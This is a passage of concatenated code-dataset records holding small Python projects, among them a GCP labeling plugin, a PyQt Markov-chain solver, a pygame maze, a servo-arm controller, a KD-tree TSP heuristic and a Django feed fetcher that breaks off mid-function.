caption='Predictions.', use_column_width=True)\n","sub_path":"flurosis_tooth_detection.py","file_name":"flurosis_tooth_detection.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593161774","text":"import logging\nimport pkgutil\nimport re\nimport typing\nfrom abc import ABCMeta, abstractmethod\nfrom functools import lru_cache\n\nfrom googleapiclient import discovery\nfrom googleapiclient import errors\n\nfrom util.config_utils import is_copying_labels_from_project, iris_prefix\nfrom util.utils import cls_by_name, shorten, methods\n\nPLUGINS_MODULE = \"plugins\"\n\n\nclass Plugin(object, metaclass=ABCMeta):\n __project_access_client = discovery.build(\"cloudresourcemanager\", \"v1\")\n __proj_regex = re.compile(r\"[a-z]([-a-z0-9]*[a-z0-9])?\")\n subclasses = []\n\n def __init__(self):\n self.counter = 0\n self._google_client = discovery.build(*self.discovery_api())\n self._batch = self._google_client.new_batch_http_request(\n callback=self.__batch_callback\n )\n\n @classmethod\n @abstractmethod\n def discovery_api(cls) -> typing.Tuple[str, str]:\n pass\n\n @classmethod\n def is_labeled_on_creation(cls) -> bool:\n \"\"\"\n Only a few classes are labeled on creation, and these classes should override this method.\n \"\"\"\n return True\n\n @lru_cache(maxsize=256)\n def _project_labels(self, project_id) -> typing.Dict:\n\n assert 
self.__proj_regex.match(project_id), project_id\n\n        request = self.__project_access_client.projects().get(projectId=project_id)\n        try:\n            response = request.execute()\n            return response.get(\"labels\", {})  # Handle case where project has no labels\n        except errors.HttpError as e:\n            logging.exception(f\"Failing to get labels for project {project_id}: {e}\")\n            return {}\n\n    def __iris_labels(self, gcp_object) -> typing.Dict[str, str]:\n        pfx = \"_gcp_\"\n\n        def legalize_value(s):\n            \"\"\"\n            Only hyphens (-), underscores (_), lowercase characters,\n            and numbers are allowed in label values. International characters are allowed.\n            \"\"\"\n            label_chars = re.compile(r\"[\\w\\d_-]\")  # cached\n            return \"\".join(c if label_chars.match(c) else \"_\" for c in s).lower()[:62]\n\n        def value(func, gcp_obj):\n            return legalize_value(func(gcp_obj))\n\n        def key(func) -> str:\n            return iris_prefix() + \"_\" + func.__name__[len(pfx) :]\n\n        ret = {key(f): value(f, gcp_object) for f in methods(self, pfx)}\n\n        return ret\n\n    def __batch_callback(self, request_id, response, exception):\n\n        if exception is not None:\n            logging.error(\n                \"in __batch_callback(), %s\",\n                exception,\n            )\n\n    def do_batch(self):\n        \"\"\"In do_label, we loop over all objects. But for efficiency, we do not process\n        them all at once, but rather gather objects and process them in batches of\n        1000 as we loop; then process the remaining at the end of the loop\"\"\"\n        try:\n            self._batch.execute()\n        except Exception as e:\n            logging.exception(e)\n        self.counter = 0\n\n    @abstractmethod\n    def do_label(self, project_id):\n        \"\"\"Label all objects of a type in a given project\"\"\"\n        pass\n\n    @abstractmethod\n    def get_gcp_object(self, log_data):\n        \"\"\"Parse logging data to get a GCP object\"\"\"\n        pass\n\n    @abstractmethod\n    def label_one(self, gcp_object: typing.Dict, project_id: str):\n        \"\"\"Tag a single new object based on its description that comes from a log line\"\"\"\n        pass\n\n    @abstractmethod\n    def api_name(self):\n        pass\n\n    @abstractmethod\n    def method_names(self):\n        pass\n\n    @classmethod\n    def init(cls):\n        def load_plugin_class(name):\n            module_name = PLUGINS_MODULE + \".\" + name\n            __import__(module_name)\n            assert name == name.lower(), name\n            plugin_cls = cls_by_name(PLUGINS_MODULE + \".\" + name + \".\" + name.title())\n            return plugin_cls\n\n        for _, module, _ in pkgutil.iter_modules([PLUGINS_MODULE]):\n            plugin_class = load_plugin_class(module)\n            Plugin.subclasses.append(plugin_class)\n\n        assert Plugin.subclasses, \"No plugins defined\"\n\n    @staticmethod\n    def create_plugin(plugin_name: str) -> \"Plugin\":\n        cls = cls_by_name(\n            PLUGINS_MODULE + \".\" + plugin_name.lower() + \".\" + plugin_name\n        )\n        plugin = cls()\n        return plugin\n\n    def _build_labels(self, gcp_object, project_id):\n        \"\"\"\n        :return dict including original labels, project labels (if the system is configured to add those)\n        and new labels. 
But if that would result in no change, return None\n \"\"\"\n\n original_labels = gcp_object[\"labels\"] if \"labels\" in gcp_object else {}\n project_labels = (\n self._project_labels(project_id) if is_copying_labels_from_project() else {}\n )\n iris_labels = self.__iris_labels(gcp_object)\n all_labels = {**iris_labels, **project_labels, **original_labels}\n if all_labels == original_labels:\n # Skip labeling because no change\n return None\n else:\n labels = {\"labels\": all_labels}\n fingerprint = gcp_object.get(\"labelFingerprint\", \"\")\n if fingerprint:\n labels[\"labelFingerprint\"] = fingerprint\n\n return labels\n\n def _name_after_slash(self, gcp_object):\n return self.__name(gcp_object, separator=\"/\")\n\n def _name_no_separator(self, gcp_object):\n return self.__name(gcp_object, separator=\"\")\n\n def __name(self, gcp_object, separator=\"\"):\n try:\n name = gcp_object[\"name\"]\n if separator:\n index = name.rfind(separator)\n name = name[index + 1 :]\n return name\n except KeyError as e:\n logging.exception(e)\n return None\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"130704425","text":"import gui\nroot = gui.Tk()\n#import date2\n#root = date2.Tk()\nroot.title('MUKYALA MUKASA KAWEMPE DOMICILIARY CLINIC')\nroot['bg']='black'\nfrmmenu=gui.FormMenu(root)\n#frmmenu._init_menu()\nfrmmenu._init_widgets()\n\n#root.geometry(\"1040x650+0+0\")\nroot.geometry(\"1040x650+200+100\")\nroot.resizable(False,False)\n\nroot.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"502030722","text":"import numpy\nimport mainwindow\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import *\n\n\nclass MainWindow(QMainWindow, mainwindow.Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.size = 0\n self.setupBtn.clicked.connect(self.reset_view)\n\n self.lambda_matrix = []\n self.calcBtn.clicked.connect(self.calculate)\n\n def enable_cell(self, i, j):\n item = QTableWidgetItem(\"-\")\n item.setFlags(Qt.ItemIsEnabled)\n brush = QBrush(QColor(168, 168, 168))\n brush.setStyle(Qt.SolidPattern)\n item.setBackground(brush)\n\n self.intensTable.setItem(i, j, item)\n\n def reset_view(self):\n self.intensTable.clear()\n self.intensTable.setRowCount(self.spinBox.value())\n self.intensTable.setColumnCount(self.spinBox.value())\n self.probTable.setRowCount(self.spinBox.value())\n self.size = self.spinBox.value()\n\n self.enable_cell(0, 0)\n self.enable_cell(0, self.size - 1)\n self.enable_cell(self.size - 1, 0)\n self.enable_cell(self.size - 1, self.size - 1)\n\n for i in range (1, self.size - 1):\n for j in range (1, self.size - 1):\n self.enable_cell(i, j)\n\n def calculate(self):\n matrix = []\n for i in range(self.size):\n row = []\n for j in range(self.size):\n val = self.intensTable.item(i, j).text()\n if val == \"-\":\n row.append(0)\n else:\n row.append(float(val))\n matrix.append(row)\n\n left = []\n for i in range(self.size):\n p = []\n sum = 0\n for j in range(self.size):\n p.append(matrix[j][i])\n sum += matrix[i][j]\n p[i] = -sum\n left.append(p)\n norm = [1.0 for i in range(self.size)]\n left[self.size - 1] = norm\n right = [0 for i in range(self.size)]\n right[self.size - 1] = 1\n numpy_matrix = numpy.array(left)\n numpy_vector = 
numpy.array(right)\n\n array = numpy.linalg.solve(numpy_matrix, numpy_vector)\n\n for i in range(self.size):\n item = QTableWidgetItem(str(round(array[i]*100, 3))+\"%\")\n self.probTable.setItem(i, 0, item)\n\n\nif __name__ == \"__main__\":\n import sys\n app = QApplication(sys.argv)\n mw = MainWindow()\n mw.show()\n sys.exit(app.exec_())\n","sub_path":"Kolmogorov equations/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634231800","text":"# https://app.codesignal.com/arcade/intro/level-2/xskq4ZxLyqQMCLshr/solutions\n\ndef matrix_elements_sum(matrix):\n\n result = 0\n banned_idx = []\n\n for row in matrix:\n for el_idx in range(len(row)):\n if row[el_idx] <= 0:\n banned_idx.append(el_idx)\n if el_idx in banned_idx:\n continue\n else:\n result += row[el_idx]\n\n return result\n","sub_path":"intro/08_matrix_elements_sum.py","file_name":"08_matrix_elements_sum.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"541010286","text":"import pygame as pg\nfrom LabyrinthUtility import *\nfrom LabyrinthGenerator import *\nimport random as rand\n\npg.init()\nendGame = False\nclock = pg.time.Clock()\n(xsize, ysize) = (100,50)\nlabyrinth = Labyrinth(xsize,ysize)\nscale = 15 #pixels per cell in labyrinth\nscreen = pg.display.set_mode((xsize*scale,ysize*scale))\nwallwidth = 3\n\ndepthFirstNoRec(labyrinth,rand.randint(0,xsize-1),rand.randint(0,ysize-1))\n\nplayer = Player(labyrinth,0,0)\nlabyrinth.characters.append(player)\n\ndef drawLabyrinth(labyrinth):\n\tscreen.fill((255,255,255))\n\tfor x in range(labyrinth.xsize):\n\t\tfor y in range(labyrinth.ysize):\n\t\t\tif labyrinth.array[x,y].pathLeft == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,y*scale),(x*scale,(y+1)*scale-1),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathRight == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),((x+1)*scale-1,y*scale),((x+1)*scale-1,(y+1)*scale-1),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathUp == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,y*scale),((x+1)*scale-1,y*scale),wallwidth)\n\t\t\tif labyrinth.array[x,y].pathDown == False:\n\t\t\t\tpg.draw.line(screen, (0,0,0),(x*scale,(y+1)*scale-1),((x+1)*scale-1,(y+1)*scale-1),wallwidth)\n\tfor c in labyrinth.characters:\n\t\tpg.draw.circle(screen,(255,0,0),(int(c.x*scale+scale/2),int(c.y*scale+scale/2)),int(scale/2-wallwidth))\n\nmoveCountDown = 0\nwhile not endGame:\n\tfor event in pg.event.get():\n\t\tif event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n\t\t\tendGame = True\n\tpressed = pg.key.get_pressed()\n\tif (pressed[pg.K_UP] or pressed[pg.K_DOWN] or pressed[pg.K_LEFT] or pressed[pg.K_RIGHT]) and moveCountDown == 0:\n\t\tmoveCountDown = 7\n\t\tif pressed[pg.K_UP]: player.moveUp()\n\t\tif pressed[pg.K_DOWN]: player.moveDown()\n\t\tif pressed[pg.K_LEFT]: player.moveLeft()\n\t\tif pressed[pg.K_RIGHT]: player.moveRight()\n\tif moveCountDown > 0:\n\t\tmoveCountDown -= 1\n\tdrawLabyrinth(labyrinth)\n\tpg.display.flip()\n\tclock.tick(60)\n","sub_path":"LabyrinthGame.py","file_name":"LabyrinthGame.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"193315894","text":"#---Control servos in robotic arm with xbox controller---#\nimport pygame, RPi.GPIO as gpio, time\n\n#control update frequency\nCLOCK = 
pygame.time.Clock()\nclock_speed = 20\n\n#vars for if program running\n#and if joystick connected\njoystick_connect = True\nrunning = True\n\n#used to end program\ndef stop():\n for i in range(0, len(servos)):\n servos[i].stop()\n pygame.quit()\n print('clean exit')\n\n#convert a value to degrees, 0-180\ndef convert(x):\n return ((1.0/18.0)*x+3)\n\ndef reset():\n for i in range(0, len(pins)):\n servos[i].ChangeDutyCycle(convert(start_pos[i]))\n \n#initailize the pygame library\npygame.init()\n\n#use first joystick connected since only\n#one xbox remote is used\njoystick = pygame.joystick.Joystick(0)\n#initailize joystick\njoystick.init()\n\n#initailize GPIO\ngpio.setmode(gpio.BCM)\ngpio.setwarnings(False)\n\n#array to hold pin numbers\npins = [21,16,12,23,25,18]\n#array of servos\nservos = []\n\n#increment variable\nstart_pos = [-15, 120, 15, 120, 35, 150]\nservo_pos = [-15, 120, 15, 120, 35, 150]\n\n#loop through all pins\n#setup pins for output mode\n#add pin to servo array\n#start servo\nfor i in range(0, len(pins)):\n gpio.setup(pins[i], gpio.OUT)\n servos.append(gpio.PWM(pins[i],50))\n\nservos[0].start(convert(servo_pos[0]))\nservos[1].start(convert(servo_pos[1]))\nservos[2].start(convert(servo_pos[2]))\nservos[3].start(convert(servo_pos[3]))\nservos[4].start(convert(servo_pos[4]))\nservos[5].start(convert(servo_pos[5]))\n \n#limits for servos\nUPPER = 180\nLOWER = 3\n\n#BOOOLS for movement\nbase_mv = False\nbase_mv_opp = False\nshoulder_mv = False\nshoulder_mv_opp = False\nelbow_mv = False\nelbow_mv_opp = False\nswivel_mv = False\nswivel_mv_opp = False\nwrist_mv = False\nwrist_mv_opp = False\ngripper_mv = False\ngripper_mv_opp = False\n\n#increment amounts\nb_mv = 3\ns_mv = 5\ne_mv = 5\nsw_mv = 5\nw_mv = 5\ng_mv = 5\n'''\nservo:\n 0 - base\n 1 - shoulders\n 2 - elbow\n 3 - swivel\n 4 - wrist\n 5 - gripper\n'''\n#run until user decides to quit\nwhile(running):\n # User did something, this applies to keyboard or\n #joystick\n for event in pygame.event.get(): \n \n # Check if anything on joystick changed \n if event.type == pygame.JOYBUTTONDOWN or event.type == pygame.JOYAXISMOTION:\n\n #Control swivel base\n #Top left axis, left direction\n #does not allow user to go past limits\n if joystick.get_axis(0) > .9:\n base_mv = True\n elif joystick.get_axis(0) < -.9:\n base_mv_opp = True\n else:\n base_mv = False\n base_mv_opp = False\n\n #Shoulders - left stick, up/down\n if joystick.get_axis(1) < -.9:\n shoulder_mv = True\n elif joystick.get_axis(1) > .9:\n shoulder_mv_opp = True\n else:\n shoulder_mv = False\n shoulder_mv_opp = False\n\n #elbow - right stick, up/down\n if joystick.get_axis(4) < -.5:\n elbow_mv = True\n elif joystick.get_axis(4) > .5:\n elbow_mv_opp = True\n else:\n elbow_mv = False\n elbow_mv_opp = False\n\n #wrist joint - A and Y, A down Y up\n if joystick.get_button(0):\n swivel_mv = True\n elif joystick.get_button(3):\n swivel_mv_opp = True\n else:\n swivel_mv = False\n swivel_mv_opp = False\n \n\n #wrist swivel - RB and LB, RB left (CCW) LB right (CW)\n if joystick.get_button(5):\n wrist_mv = True\n elif joystick.get_button(4):\n wrist_mv_opp = True\n else:\n wrist_mv = False\n wrist_mv_opp = False\n\n #gripper - Left trigger open, right trigger close\n if joystick.get_axis(2) < -.5:\n gripper_mv = True\n elif joystick.get_axis(5) < -.5:\n gripper_mv_opp = True\n else:\n gripper_mv = False\n gripper_mv_opp = False\n \n #exit program if start button pressed\n if joystick.get_button(7):\n running = False\n \n #move base\n if base_mv and servo_pos[0] <= 100:\n 
servo_pos[0] += b_mv\n servos[0].ChangeDutyCycle(convert(servo_pos[0]))\n elif base_mv_opp and servo_pos[0] >= -15:\n servo_pos[0] -= b_mv\n servos[0].ChangeDutyCycle(convert(servo_pos[0]))\n\n #Shoulders - left stick, up/down\n if shoulder_mv and servo_pos[1] <= 130:\n servo_pos[1] += s_mv\n servos[1].ChangeDutyCycle(convert(servo_pos[1]))\n elif shoulder_mv_opp and servo_pos[1] >= 0:\n servo_pos[1] -= s_mv\n servos[1].ChangeDutyCycle(convert(servo_pos[1]))\n\n #elbow - right stick, up/down\n if elbow_mv and servo_pos[2] <= 100:\n servo_pos[2] += e_mv\n servos[2].ChangeDutyCycle(convert(servo_pos[2]))\n elif elbow_mv_opp and servo_pos[2] >= 0:\n servo_pos[2] -= e_mv\n servos[2].ChangeDutyCycle(convert(servo_pos[2]))\n\n #wrist joint - A and Y, A down Y up\n if swivel_mv and servo_pos[3] <= 170:\n servo_pos[3] += sw_mv\n servos[3].ChangeDutyCycle(convert(servo_pos[3]))\n elif swivel_mv_opp and servo_pos[3] >= 10:\n servo_pos[3] -= sw_mv\n servos[3].ChangeDutyCycle(convert(servo_pos[3]))\n\n #wrist swivel - RB and LB, RB left (CCW) LB right (CW)\n if wrist_mv and servo_pos[4] <= 180:\n servo_pos[4] += w_mv\n servos[4].ChangeDutyCycle(convert(servo_pos[4]))\n elif wrist_mv_opp and servo_pos[4] >= 0:\n servo_pos[4] -= w_mv\n servos[4].ChangeDutyCycle(convert(servo_pos[4]))\n\n #gripper - Left trigger open, right trigger close\n if gripper_mv and servo_pos[5] <= 170:\n servo_pos[5] += g_mv\n servos[5].ChangeDutyCycle(convert(servo_pos[5]))\n elif gripper_mv_opp and servo_pos[5] >= 0:\n servo_pos[5] -= g_mv\n servos[5].ChangeDutyCycle(convert(servo_pos[5]))\n\n \n #set clock speed to limit cpu usage\n CLOCK.tick(clock_speed)\n \n#end program\nstop()\n\n","sub_path":"robo_arm.py","file_name":"robo_arm.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442411170","text":"# Val Chapple\n# Cody Dhein\n# Date: Nov 22, 2017\n#\n# Resources:\n# Overall Concepts: An introductory tutorial on kd trees by Andrew W Moore\n# Carnegie Mellon University, Extract from Andrew Moore's PhD Thesis\n# Construction: https://www.cise.ufl.edu/class/cot5520fa09/CG_RangeKDtrees.pdf\n# Querying: https://web.engr.oregonstate.edu/~tgd/classes/534/slides/part3.pdf\n#\nimport sys\nfrom operator import itemgetter\n\n#import random\nimport heapq\nimport math\nimport timeit\nimport numpy as np\n\n# KDTreeNN\n#\n# Build KDTree from city data points\n# Use Tree to find solution\ndef kdTreeNN(filename, outfilename):\n # Read file with city Id, city x, and city y\n try:\n inFile = open(filename, \"r\")\n except:\n print(\"No file named: \" + filename)\n sys.exit()\n\n text = inFile.read().splitlines()\n\n # Save data as 2D list [ [ id, x, y ],... 
]\n points = [ [int(i[0]), int(i[1]), int(i[2])] for i in [j.split() for j in text ]]\n\n # Create kd-tree structure with points, 0 start depth, and 2D(x and y)\n root = kDTree( points, 0, 2)\n\n # Set Max number of Nearest Neighbors to Keep\n numNN = len(points) * .002\n if (numNN < 10):\n numNN = 10\n\n (totalDist, route, distSqdMatrix) = kDTreeSearchNN(root, len(points), numNN)\n\n # if (len(points) <= 400 ):\n # (totalDist, route) = twoOptImprove(route , distSqdMatrix)\n\n # Save route\n outFile = open(outfilename, \"w\")\n outFile.write(str(totalDist) + \"\\n\")\n for i in route:\n outFile.write(str(i.city[0]) + \"\\n\")\n return\n\n# kDNode\n# Nodes of trees\n# value is the city\n# left and right point to other nodes\n# dim represents the splitting axis (aka index to use on the city data)\nclass kDNode:\n def __init__(self, city, left, right, dim):\n self.city = city\n self.visited = False\n self.left = left\n self.right = right\n self.dim = dim # 0 or 1\n self.nn = []\n\n def addNN( self, distSqd, node, maxNN ):\n if ( distSqd, node ) in self.nn:\n return\n if len(self.nn) < maxNN:\n self.nn.append( ( distSqd, node ) )\n else:\n self.nn.sort(key=itemgetter(0), reverse=True)\n if (self.nn[0][0] > distSqd):\n # Replace largest dist with dist\n self.nn[0] = ( distSqd, node )\n\n def getNNs( self ):\n return [ x for x in self.nn ]\n\n def __str__(self, level=1):\n ret = \"\"\n ret += \"\\t\"*(level-1)+\"-----\"+repr(self.city[0])+\"\\n\"\n if self.left != None:\n ret += self.left.__str__(level+1)\n if self.right != None:\n ret += self.right.__str__(level+1)\n return ret\n\n\n# kDTree\n# Creates kd-tree recursively with city data, depth into tree and dimensions (k)\n# Returns a kDNode and its subtree\ndef kDTree( points, depth, k ):\n # Check that points has a list\n if len(points) < 1:\n return None\n\n # sort by axis chosen to find median:\n # even for x= equation, and odd for y= equation\n points.sort(key=itemgetter(depth % k + 1))\n mid = len(points) / 2\n\n return kDNode(\n points[mid],\n kDTree(points[:mid], depth + 1, k),\n kDTree(points[mid+1:], depth + 1, k),\n depth % k + 1\n )\n\n# kDTreeSearchNN\n# Determines a tour distance and route\n# Uses greedy method of finding nearest unvisited city to target city\ndef kDTreeSearchNN( tree, numCities, maxNN ):\n start = tree\n target = tree\n tree.visited = True\n route = [ tree ]\n totalDist = 0\n\n distSqdMatrix = [[ -1 for i in range(0,numCities)] for j in range(0,numCities)]\n\n # Find nearest city for entire loop\n while len(route) < numCities:\n #print(str(len(route)) + \" \" + str(numCities))\n heap = []\n bestDistSqd = float('inf')\n bestNode = None\n\n # Add to priority queue\n heapq.heappush( heap, (0 , tree ) )\n # Get target's nearest neighbors\n bestSumDists = float('inf')\n while len(heap) != 0:\n (d, node) = heapq.heappop( heap )\n if (d >= bestDistSqd):\n continue # No node is closer, continue while loop\n if node == None:\n continue # Skip node\n\n # Get distance squared value for comparison\n dist = distSqdMatrix[ node.city[0] ][ target.city[0] ]\n\n if dist == -1:\n dist = dist_sqd( node.city, target.city )\n distSqdMatrix[ target.city[0] ][ node.city[0] ] = dist\n distSqdMatrix[ node.city[0] ][ target.city[0] ] = dist\n target.addNN( dist , node, maxNN)\n\n if node.visited == False:\n if (dist < bestDistSqd ):\n bestDistSqd = dist\n bestNode = node\n\n # Add child nodes to priority queue, adjusting priority left/right\n if (target.city[node.dim] <= node.city[node.dim]):\n heapq.heappush(heap, (0, node.left ))\n 
heapq.heappush(heap, (dist, node.right )) # sorting by dist?\n else:\n heapq.heappush(heap, (0, node.right ))\n heapq.heappush(heap, (dist, node.left ))\n\n # Add nearest neighbor to route, mark visited, update target\n if bestNode != None:\n bestNode.visited = True\n route.append(bestNode)\n target = bestNode\n totalDist += int(round(math.sqrt(bestDistSqd)))\n\n # Add distance from last target city to start city\n totalDist += int(round(math.sqrt(dist_sqd(target.city, start.city))))\n return (totalDist, route, distSqdMatrix)\n\ndef dist_sqd( city1, city2 ):\n x_dist = abs(city2[1] - city1[1])\n y_dist = abs(city2[2] - city1[2])\n return x_dist*x_dist + y_dist*y_dist\n\n# swaps edges\n# accepts the full route and the indices for two nodes to swap\ndef twoOptSwap(route,i,j):\n\tnew_route = route[:i]\n\ttmp = list(reversed(route[i:j+1]))\n\tnew_route.extend(tmp)\n\tnew_route.extend(route[j+1:])\n\treturn new_route\n\n# Performs a twoOpt improvement on the candidate solution\ndef twoOptImprove(route,distances):\n noSwap = route[0]\n currentBest = calcLength(route,distances)\n prevBest = currentBest + 1\n n = 0\n while currentBest < prevBest:\n n += 1\n #print(str(n))\n prevBest = currentBest\n for i in range(1,len(route)-2):\n for j in range(i+1,len(route)-1):\n #print 'Try swap ' + str(route[i]) + ', ' + str(route[j])\n candidate = twoOptSwap(route,i,j)\n candidate_dist = calcLength(candidate,distances)\n if candidate_dist < currentBest:\n route = candidate\n currentBest = candidate_dist\n #break\n # else:\n\t\t\t# \tcontinue\n # break\n currentBest = calcLength(route,distances)\n return (currentBest, route )\n\n# calculates total length of the given tour\n# accepts the tour and a distance Matrix\ndef calcLength(tour, dists):\n length = 0\n\n for i in range(len(tour)-1):\n j = i+1\n c1 = tour[i]\n c2 = tour[j]\n length += int(round(math.sqrt(dists[c1][c2])))\n length += int(round(math.sqrt(dists[ tour[0] ][ tour[len(tour)-1] ] )))\n return length\n\n\nif __name__ == '__main__':\n t1= timeit.default_timer()\n # Check input file name exists\n try:\n filename = sys.argv[1]\n except:\n print(\"Usage: \" + sys.argv[0] + \" \")\n sys.exit()\n #random.seed(1)\n outfilename = filename + \".tour\"\n kdTreeNN(filename, outfilename)\n\n t2 = timeit.default_timer()\n\n fileWrite = open(filename + \".tourTime\", \"w\")\n fileWrite.write(str(t2-t1) + \"\\n\")\n fileWrite.close()\n","sub_path":"NN_KDTree/KDTree-FAST-results/KDTree-FAST.py","file_name":"KDTree-FAST.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"85178183","text":"class Node:\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n\n def get_value(self):\n return self.value\n\n def get_next(self):\n return self.next\n\n def set_next(self, new_next):\n self.next = new_next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n # self.tail = None\n\n def add_to_head(self, value):\n node = Node(value)\n\n if self.head is not None:\n node.set_next(self.head)\n self.head = node\n\n def add_to_tail(self, value):\n node = Node(value)\n\n if self.tail is not None:\n self.tail.next = node\n self.tail = node\n\n def contains(self, value):\n if not self.head:\n return False\n\n current = self.head\n\n while current:\n if current.get_value() == value:\n return True\n\n current = current.get_next()\n\n return False\n\n # def reverse_list(self, node, prev): what the _ is prev????\n def reverse_list(self, node, 
prev):\n        marker1 = None\n        marker2 = self.head\n        \n        while marker2 is not None:\n            marker3 = marker2.next\n            marker2.next = marker1\n            marker1 = marker2\n            marker2 = marker3\n        self.head = marker1\n\n    def reverse_recursive_list(self, node, prev):\n        if self.head is None:\n            return\n        cascade = False\n        next = None\n        \n        if node.next is None: \n            self.head = node\n            cascade = True\n        next = node.next\n        node.next = prev\n\n        if cascade == True:\n            return\n        self.reverse_recursive_list(next, node)\n        \n\nmyLL = LinkedList()\nmyLL.add_to_head(1)\nmyLL.add_to_head(2)\nmyLL.add_to_head(3)\nmyLL.add_to_head(4)\nmyLL.add_to_head(5)\nmyLL.reverse_recursive_list(myLL.head, None)\n","sub_path":"reverse/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"585728495","text":"#coding:utf-8\n\n\"\"\"\nFibonacci sequence\n\"\"\"\n\nclass Fabs:\n    def __init__(self,max):\n        self.max = max\n        self.a = 0\n        self.b = 1\n\n    def __iter__(self):\n        return self\n\n    def __index__(self):\n        Fabs = self.a\n        if Fabs > self.max:\n            raise StopIteration\n        self.a,self.b = self.b,self.a+self.b\n        return Fabs\n\nf = Fabs(10000)\nlst = [f.__index__() for i in range(10)]\nprint(lst)\n\n","sub_path":"迭代器方式计算斐波那契数列.py","file_name":"迭代器方式计算斐波那契数列.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"509265685","text":"import cgitb\nimport configparser\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom pymongo import MongoClient\nimport mwfeeds.controlers.ParseFeed\nimport mwfeeds.controlers.GetRegionFixFeed\nimport mwfeeds.controlers.GetJavascriptPage\nimport urllib\nimport urllib.request\nimport re\nimport json\n\ncgitb.enable()\nconfig = configparser.ConfigParser()\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\n\ndef index(req):\n    c = {}\n    id = req.GET.get('id', '')\n    if id == '':\n        c[\"message\"] = \"Invalid Feed Id\"\n        return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n    else:\n        client = MongoClient(config.get(\"active\", \"DBUrl\"))\n        db = client.mwfeeds\n        feedsCollection = db.feeds\n        myFeed = feedsCollection.find_one({\"_id\":int(id.strip())})\n        if myFeed[\"feedType\"] == \"HTML\":\n            return getHTMLFeed(req, myFeed)\n        elif myFeed[\"feedType\"] == \"SetEncoding\":\n            return getSetEncodingFeed(req, myFeed)\n        elif myFeed[\"feedType\"] == \"Sharepoint\":\n            return getFeedSharepoint(req, myFeed)\n        elif myFeed[\"feedType\"] == \"Combine\":\n            return getCombineFeed(req, myFeed)\n        elif myFeed[\"feedType\"] == \"RegionFix\" or myFeed[\"feedType\"] == \"Region Fix\":\n            return mwfeeds.controlers.GetRegionFixFeed.processFeed(req,myFeed)\n            #c[\"message\"] = \"Region Fix Feed\"\n            #return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n        else:\n            c[\"message\"] = \"Feed type \" + myFeed[\"feedType\"] + \" is not supported.\"\n            return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getHTMLFeed(req,myFeed):\n    c = {}\n    try:\n        HTMLSource = \"\"\n        if myFeed[\"javascriptEnabled\"] == True:\n            HTMLSource = mwfeeds.controlers.GetJavascriptPage.getJavascriptPage(myFeed[\"url\"])\n        else:\n            fp = urllib.request.urlopen(myFeed[\"url\"])\n            mybytes = fp.read()\n            HTMLSource = mybytes.decode(\"utf8\")\n        myFeed[\"HTMLSourceText\"] = HTMLSource\n        try:\n            c[\"CustomTitle\"] = myFeed[\"CustomTitle\"]\n        except:\n            c[\"CustomTitle\"] = \"\"\n        try:\n            
c[\"CustomDescription\"] = myFeed[\"CustomDescription\"]\n except:\n c[\"CustomDescription\"] = \"\"\n c[\"ItemList\"] = mwfeeds.controlers.ParseFeed.parseFeed(myFeed)\n return render(req, \"RSSTemplate.pyv\", c, content_type=\"text/xml\")\n except Exception as ex:\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, content_type=\"text/plain\")\n\ndef getSetEncodingFeed(req,myFeed):\n try:\n myHeaders = {'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"}\n request = urllib.request.Request(myFeed[\"url\"], headers=myHeaders)\n source = \"\"\n with urllib.request.urlopen(request) as response:\n encoding = response.headers.get_content_charset()\n if encoding is not None:\n source = response.read().decode(encoding)\n else:\n source = response.read().decode(\"ISO-8859-1\")\n rssText = re.sub(\"(\\<\\?xml(?:.+?)\\?\\>)\",\"\",source)\n returnValue = \"\"\n try:\n returnValue += rssText.encode('utf-8')\n except:\n returnValue += rssText\n c={}\n c[\"message\"] = returnValue\n return HttpResponse(rssText, content_type=\"text/xml\")\n except Exception as ex:\n c={}\n c[\"message\"] = str(ex)\n return render(req, \"GetFeedMessage.pyv\", c, 